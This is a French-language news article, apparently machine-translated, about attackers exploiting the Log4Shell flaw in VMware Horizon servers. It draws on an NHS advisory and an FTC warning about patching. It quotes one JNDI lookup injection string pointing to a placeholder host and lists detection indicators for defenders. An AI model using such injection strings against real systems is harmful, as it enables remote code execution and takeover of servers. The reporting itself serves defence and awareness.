Des systèmes de correctifs vulnérables aux failles critiques de Log4j, avertissent les responsables britanniques et américains


Des systèmes de correctifs vulnérables aux failles critiques de Log4j, avertissent les responsables britanniques et américains

Getty Images

Les criminels exploitent activement la vulnérabilité Log4Shell de haute gravité sur les serveurs exécutant VMware Horizon dans le but d’installer des logiciels malveillants qui leur permettent de prendre le contrôle total des systèmes concernés, met en garde le système de santé public du Royaume-Uni.

CVE-2021-44228 est l’une des vulnérabilités les plus graves mises en lumière ces dernières années. Il réside dans Log4J, une bibliothèque de codes de journalisation système utilisée dans des milliers, voire des millions d’applications et de sites Web tiers. Cela signifie qu’il existe une énorme base de systèmes vulnérables. De plus, la vulnérabilité est extrêmement facile à exploiter et permet aux attaquants d’installer des shells Web, qui fournissent une fenêtre de commande pour exécuter des commandes hautement privilégiées sur des serveurs piratés.

La faille d’exécution de code à distance dans Log4J venu à la lumière en décembre après la publication du code d’exploitation avant qu’un correctif ne soit disponible. Les pirates malveillants ont rapidement commencé exploiter activement CVE-2021-44228 à compromettre les systèmes sensibles.

Les attaques, y compris celles ciblant VMware Horizon, se poursuivent depuis lors.

« Un groupe de menaces inconnu a été observé ciblant les serveurs VMware Horizon exécutant des versions affectées par Vulnérabilités Log4Shell afin d’établir la persistance au sein des réseaux affectés », des responsables du National Health System du Royaume-Uni a écrit. Ils ont ensuite fourni des conseils sur les mesures spécifiques que les organisations concernées peuvent prendre pour atténuer la menace.

La principale d’entre elles est la recommandation d’installer une mise à jour qui VMware publié pour son produit Horizon, qui donne aux organisations un moyen de virtualiser les capacités des postes de travail et des applications à l’aide de la technologie de virtualisation de l’entreprise. Les responsables du NHS ont également noté des signes que les organisations vulnérables peuvent rechercher pour identifier les attaques possibles qu’elles ont pu subir.

L’avis intervient un jour après que la Federal Trade Commission averti entreprises orientées vers les consommateurs pour corriger les systèmes vulnérables afin d’éviter le sort d’Equifax. En 2019, l’agence d’évaluation du crédit a accepté de payer 575 millions de dollars pour régler les frais de la FTC résultant de son échec à corriger une vulnérabilité tout aussi grave dans un autre logiciel connu sous le nom d’Apache Struts. Lorsqu’un attaquant inconnu a exploité la vulnérabilité dans le réseau d’Equifax, cela a conduit à la compromission de données sensibles pour 143 millions de personnes, ce qui en fait l’un des pires violations de données jamais.

« La FTC a l’intention d’utiliser toute son autorité légale pour poursuivre les entreprises qui ne prennent pas de mesures raisonnables pour protéger les données des consommateurs contre l’exposition à Log4j ou à des vulnérabilités connues similaires à l’avenir », des responsables de la FTC. mentionné

Le NHS est au moins la deuxième organisation à observer des exploits ciblant un produit VMware. Le mois dernier, des chercheurs signalé que les attaquants ciblaient des systèmes exécutant VMware VCenter dans le but d’installer le ransomware Conti.

Les attaques ciblant les serveurs VMware Horizon non corrigés visent son utilisation d’un service open source.

“L’attaque est très probablement lancée via une charge utile Log4Shell similaire à $ {jndi:ldap://example.com}”, a déclaré l’avis du NHS. « L’attaque exploite la vulnérabilité Log4Shell dans le service Apache Tomcat qui est intégré à VMware Horizon. Cela lance ensuite la commande PowerShell suivante, générée à partir de ws_TomcatService.exe : »

NHS

Après quelques étapes supplémentaires, les attaquants sont en mesure d’installer un shell Web qui a une communication permanente avec un serveur qu’ils contrôlent. Voici une représentation de l’attaque :

NHS

L’avis a ajouté :

Les organisations doivent rechercher les éléments suivants :

  • Preuve de ws_TomcatService.exe engendrer des processus anormaux
  • Quelconque powershell.exe processus contenant ‘VMBlastSG’ dans la ligne de commande
  • Modifications de fichier dans ‘…VMwareVMware ViewServerappblastgatewaylibabsg-worker.js’ – Ce fichier est généralement écrasé lors des mises à niveau et n’est pas modifié

La société de sécurité Praetorian libérée vendredi cet outil pour identifier les systèmes vulnérables à grande échelle.



Source link